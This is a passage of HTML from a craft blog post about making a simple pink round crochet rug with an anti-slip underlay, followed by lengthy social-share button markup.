&#8211; chain 1 &#8211; skip 2 stitches &#8211; 1 slip stitch in following stitch &#8211; chain 1 &#8211; skip 2 stitches&#8217; and then continued repeating it all the way round.</p><p>And that pretty much concludes how the rug was made.</p></blockquote><p>&nbsp;<br> &nbsp;</p><p><img class="aligncenter size-full wp-image-54513" src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-1-b-wm.jpg alt="how to make a round crochet rug" height=420 width=630 srcset="https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-1-b-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-1-b-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-jpibfi-post-title="How To Make A Simple Round Crochet Rug" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-1-b-wm.jpg></p><blockquote><p>And here it is in full action.</p><p>The round rug currently resides in our living room, serving mostly as playing headquarters.</p></blockquote><p>&nbsp;<br> &nbsp;</p><p><img class="aligncenter size-full wp-image-54526" src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-6-wm.jpg alt="how to make a round crochet rug" height=420 width=630 srcset="https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-6-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-6-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-jpibfi-post-title="How To Make A Simple Round Crochet Rug" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-6-wm.jpg></p><blockquote><p>After sewing the unti-slip underlay to the underside of the rug, it works just like a charm.</p><p>Thanks for letting me share.</p><p>See ya!</p><p>With love,</p><p>Petra</p></blockquote><p>&nbsp;</p><div class="essb_links essb_counters essb_counter_modern_top essb_displayed_bottom essb_share essb_template_clear-retina essb_1877893649 essb_links_center print-no" id=essb_displayed_bottom_1877893649 data-essb-postid=54512 data-essb-position=bottom data-essb-button-style=icon data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-essb-twitter-url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-essb-instance=1877893649><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" style="display: none !important;" data-counter-pos=left><span class="essb_totalcount essb_t_l" title="Total: "><span class=essb_total_text>Total: </span><span class=essb_t_nb>179</span></span></li><li class="essb_item essb_link_print nolightbox"> <span class=essb_counter data-cnt=23 data-cnt-short=23>23</span><a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;print_friendly&#39;,&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_facebook nolightbox"> <span class=essb_counter data-cnt=9 data-cnt-short=9>9</span><a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;facebook&#39;,&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <span class=essb_counter data-cnt=47 data-cnt-short=47>47</span><a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=How+To+Make+A+Simple+Round+Crochet+Rug&amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;counturl=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;twitter&#39;,&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <span class=essb_counter data-cnt=7 data-cnt-short=7>7</span><a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;google&#39;,&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <span class=essb_counter data-cnt=37 data-cnt-short=37>37</span><a href=# title onclick="essb.pinterest_picker(&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <span class=essb_counter data-cnt=11 data-cnt-short=11>11</span><a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;stumbleupon&#39;,&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_mail nolightbox"> <span class=essb_counter data-cnt=45 data-cnt-short=45>45</span><a href=# title onclick="essb_open_mailform(&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href=# title onclick="essb.toggle_more_popup(&#39;1877893649&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_more"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_1877893649 essb_morepopup_bottom" style=display:none;> <a href=# class=essb_morepopup_close onclick="essb.toggle_less_popup('1877893649'); return false;"><i class=essb_icon_close></i></a><div class="essb_morepopup_content essb_morepopup_content_1877893649"><div class="essb_links essb_displayed_more_popup essb_share essb_template_clear-retina essb_587041724 essb_width_columns_3 essb_links_center print-no" id=essb_displayed_more_popup_587041724 data-essb-postid=54512 data-essb-position=more_popup data-essb-button-style=button data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-essb-twitter-url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-essb-instance=587041724><ul class=essb_links_list><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;facebook&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class=essb_network_name>Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=How+To+Make+A+Simple+Round+Crochet+Rug&amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;counturl=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;twitter&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class=essb_network_name>Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;google&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class=essb_network_name>Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href=# title onclick="essb.pinterest_picker(&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class=essb_network_name>Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug&amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug&amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;linkedin&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_linkedin"></span><span class=essb_network_name>LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;digg&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_digg"></span><span class=essb_network_name>Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://del.icio.us/login?log=out&provider=essb&title=How+To+Make+A+Simple+Round+Crochet+Rug&url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&v=5" title onclick="essb.window(&#39;https://del.icio.us/login?log=out&provider=essb&title=How+To+Make+A+Simple+Round+Crochet+Rug&url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&v=5&#39;,&#39;del&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_del"></span><span class=essb_network_name>Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;stumbleupon&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class=essb_network_name>StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=How+To+Make+A+Simple+Round+Crochet+Rug&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.window(&#39;http://tumblr.com/share?s=&v=3&t=How+To+Make+A+Simple+Round+Crochet+Rug&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&#39;,&#39;tumblr&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_tumblr"></span><span class=essb_network_name>Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;vk&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_vk"></span><span class=essb_network_name>VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;print_friendly&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class=essb_network_name>Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href=# title onclick="essb_open_mailform(&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class=essb_network_name>Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&title=How%2BTo%2BMake%2BA%2BSimple%2BRound%2BCrochet%2BRug&description=+Hi+friends%21+In+the+past+few+months+I%27ve+been+really+eager+to+pour+more+color+into+the+place+where+I+live.+Just+for+fun.+To+make+us+feel+better.+And+while+doing+that+I+learned+one+big+thing+about+me+-+I+can+find+a+good+excuse+to+use+PINK+in+every+project%2C+for+every+room+%28I+honestly+did+not+know+that+about+myself%2C+but+now+I+do...%29+%3A%29+With+this+and+this+happy+project+under+my+belt%2C+I+am+super-excited+to+share+with+you+another+thing+I+made%2C+my+newest+darling%2C+the+crochet+round+rug.+And+it%27s+pink.+Yes.+What+else+is+new%2C+you+might+ask.+%3A%29+Anyways%2C+I+had+been+planning+to+make+a+big+area+rug+for+quite+some+time.+The+only+thing+that+was+holding+me+back+was+the+fact+that+I+did+not+really+know+how+to+prevent+the+rug+from+slipping+%28with+a+little+baby+in+the+house%2C+that+was+my+top+priority%29.+%26nbsp%3B+%26nbsp%3B+This+issue+was+miraculously+solved+one+day+when+I+stumbled+upon+this+Ikea+product.+The+Stopp+unti-slip+underlay+keeps+the+rug+in+place%2C+which+reduces+the+risk+of+slipping+an&language=sq_AL&tags=crochet%2Crug&hidden=0&category=text" title onclick="essb.window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&title=How%2BTo%2BMake%2BA%2BSimple%2BRound%2BCrochet%2BRug&description=+Hi+friends%21+In+the+past+few+months+I%27ve+been+really+eager+to+pour+more+color+into+the+place+where+I+live.+Just+for+fun.+To+make+us+feel+better.+And+while+doing+that+I+learned+one+big+thing+about+me+-+I+can+find+a+good+excuse+to+use+PINK+in+every+project%2C+for+every+room+%28I+honestly+did+not+know+that+about+myself%2C+but+now+I+do...%29+%3A%29+With+this+and+this+happy+project+under+my+belt%2C+I+am+super-excited+to+share+with+you+another+thing+I+made%2C+my+newest+darling%2C+the+crochet+round+rug.+And+it%27s+pink.+Yes.+What+else+is+new%2C+you+might+ask.+%3A%29+Anyways%2C+I+had+been+planning+to+make+a+big+area+rug+for+quite+some+time.+The+only+thing+that+was+holding+me+back+was+the+fact+that+I+did+not+really+know+how+to+prevent+the+rug+from+slipping+%28with+a+little+baby+in+the+house%2C+that+was+my+top+priority%29.+%26nbsp%3B+%26nbsp%3B+This+issue+was+miraculously+solved+one+day+when+I+stumbled+upon+this+Ikea+product.+The+Stopp+unti-slip+underlay+keeps+the+rug+in+place%2C+which+reduces+the+risk+of+slipping+an&language=sq_AL&tags=crochet%2Crug&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flattr"></span><span class=essb_network_name>Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;http://reddit.com/submit?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;reddit&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_reddit"></span><span class=essb_network_name>Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a href="https://bufferapp.com/add?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&text=How+To+Make+A+Simple+Round+Crochet+Rug&via=&picture=&count=horizontal&source=button" title onclick="essb.window(&#39;https://bufferapp.com/add?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&text=How+To+Make+A+Simple+Round+Crochet+Rug&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_buffer"></span><span class=essb_network_name>Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href=# title onclick="essb.loveThis(&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_love"></span><span class=essb_network_name>Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&pic=" title onclick="essb.window(&#39;http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&pic=&#39;,&#39;weibo&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_weibo"></span><span class=essb_network_name>Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=How+To+Make+A+Simple+Round+Crochet+Rug&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.window(&#39;https://getpocket.com/save?title=How+To+Make+A+Simple+Round+Crochet+Rug&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&#39;,&#39;pocket&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pocket"></span><span class=essb_network_name>Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;xing&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_xing"></span><span class=essb_network_name>Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;ok&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_ok"></span><span class=essb_network_name>Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&#39;,&#39;mwp&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mwp"></span><span class=essb_network_name>ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug%20http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.tracking_only('', 'whatsapp', '587041724', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_whatsapp"></span><span class=essb_network_name>WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;meneame&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meneame"></span><span class=essb_network_name>Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&n=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&n=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;blogger&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_blogger"></span><span class=essb_network_name>Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;amazon&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_amazon"></span><span class=essb_network_name>Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;yahoomail&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yahoomail"></span><span class=essb_network_name>Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=How+To+Make+A+Simple+Round+Crochet+Rug&body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&ui=2&tf=1" title onclick="essb.window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=How+To+Make+A+Simple+Round+Crochet+Rug&body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_gmail"></span><span class=essb_network_name>Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=How+To+Make+A+Simple+Round+Crochet+Rug&body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=How+To+Make+A+Simple+Round+Crochet+Rug&body=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;aol&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_aol"></span><span class=essb_network_name>AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&h=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&h=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;newsvine&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_newsvine"></span><span class=essb_network_name>Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&t=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;hackernews&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_hackernews"></span><span class=essb_network_name>HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;evernote&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_evernote"></span><span class=essb_network_name>Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://myspace.com/post?u=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;myspace&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_myspace"></span><span class=essb_network_name>MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&description=" title onclick="essb.window(&#39;http://connect.mail.ru/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&description=&#39;,&#39;mailru&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mailru"></span><span class=essb_network_name>Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://www.viadeo.com/?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&amp;title=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;viadeo&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viadeo"></span><span class=essb_network_name>Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="https://social-plugins.line.me/lineit/share?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.tracking_only('', 'line', '587041724', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_line"></span><span class=essb_network_name>Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug" title onclick="essb.window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&#39;,&#39;flipboard&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flipboard"></span><span class=essb_network_name>Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href=#comments title onclick="essb.tracking_only('', 'comments', '587041724', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_comments"></span><span class=essb_network_name>Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&image=&yumtype=button" title onclick="essb.window(&#39;http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&image=&yumtype=button&#39;,&#39;yummly&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yummly"></span><span class=essb_network_name>Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug%20http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.window(&#39;sms:&body=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug%20http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&#39;,&#39;sms&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_sms"></span><span class=essb_network_name>SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug%20http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.tracking_only('', 'viber', '587041724', true);" target=_blank 